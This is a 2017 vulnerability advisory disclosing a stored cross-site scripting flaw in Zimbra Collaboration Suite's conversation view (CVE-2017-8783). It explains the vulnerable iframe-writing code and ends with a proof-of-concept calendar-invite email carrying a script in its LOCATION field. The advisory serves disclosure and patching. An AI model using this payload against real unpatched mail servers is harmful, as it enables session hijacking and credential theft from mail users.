Advisory

Stephan Kaag, April 2017

Cross-Site Scripting vulnerability in Zimbra Collaboration Suite

Abstract

A Cross-Site Scripting vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions such as performing arbitrary actions on their behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.

See also

- CVE-2017-8783
- Zimbra Collaboration 8.7.10 GA Release
- Persistent XSS - location
- Zimbra Collaboration - Security Vulnerability Advisories

Tested versions

This issue was successfully tested on ZCS 8.7.1_GA_1670 (build 20161025045142). It is however likely that this issue is present in all versions of ZCS from version 8.5.0 on.

Fix

The issue is fixed in Zimbra Collaboration Suite version 8.7.10.

Introduction

Zimbra is an enterprise-class email, calendar and collaboration solution built for the cloud, both public and private. It has a browser-based interface. It runs on any device: smartphone, tablet and desktop or laptop computer running Windows, Linux or OS X.

A Cross-Site Scripting vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions such as performing arbitrary actions on their behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.

Details

If an email is opened in the conversation view of the web interface the body of the mail is loaded by ZCS. While doing so, it splits the message body into parts and, depending on the content-type, tries to fetch the original content corresponding to the part it is processing. It uses the AjxStringUtil._getOriginalHtmlContent method within the AjxStringUtil.js file to do this.

The vulnerable code in the AjxStringUtil.js file is as follows:
AjxStringUtil._getOriginalHtmlContent = function(text) {
   
   // strip <script> tags (which should not be there)
   var htmlNode = AjxStringUtil._writeToTestIframeDoc(text);
   while (AjxStringUtil.SCRIPT_REGEX.test(text)) {
      text = text.replace(AjxStringUtil.SCRIPT_REGEX, "");
   }
   
   ...
}
   
AjxStringUtil._writeToTestIframeDoc = function(html) {
   var iframe;
   ...
   iframe = document.getElementById(AjxStringUtil.__curIframeId);
   var idoc = Dwt.getIframeDoc(iframe);
   idoc.open();
   idoc.write(html);
   idoc.close();
   ...
};


The text variable used in the code above is directly loaded into a hidden iframe. However, this variable can contain HTML originating from the email body. If an attacker were to include a <script> tag in this HTML it will execute in the context of the iframe. As a result it is possible to interact with the ZCS interface through the window.parent property in JavaScript.

In order for an attacker to successfully exploit this issue a victim needs to have ZCS configured to open email messages in the conversation view.
Email messages will be opened in this view when two or more mails have been received from the same sender. In this case ZCS regards them as a conversation.

First the attacker can send a simple email to a victim.
Next, the attacker has to send a calendar invite according to the following specifications:
1. An arbitrary value in the DESCRIPTION.
2. A value containing script code in the LOCATION.

Together these two messages together will form a conversation in the victim's ZCS environment. If the victim opens this conversation the script code will be executed.

Proof of concept

The following proof of concept email with a calendar invite can be used to demonstrate this issue:
---[snip]---
From: me@example.com
To: victim@example.com
Subject: Re: My message
MIME-Version: 1.0
Content-class: urn:content-classes:calendarmessage
Content-type: text/calendar; method=REQUEST; charset=UTF-8
Content-transfer-encoding: 8BIT
Date: Tue, 25 Apr 2017 06:21:52 +0000
   
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:-//My/Fun//EN
VERSION:2.0
BEGIN:VEVENT
ORGANIZER:mailto:u1@dom.loc
UID:2017042604
DTSTAMP:20170426T000000Z
DTSTART:20170426T160000Z
DTEND:20170426T170000Z
DESCRIPTION:desc
SUMMARY:summary
LOCATION:<script>window.parent.alert(1);</script>
END:VEVENT
END:VCALENDAR
---[snip]---

Below is a screenshot of the XSS in action:
/advisory/SFY20170409/poc.gif

Latest News & Research

Work with us →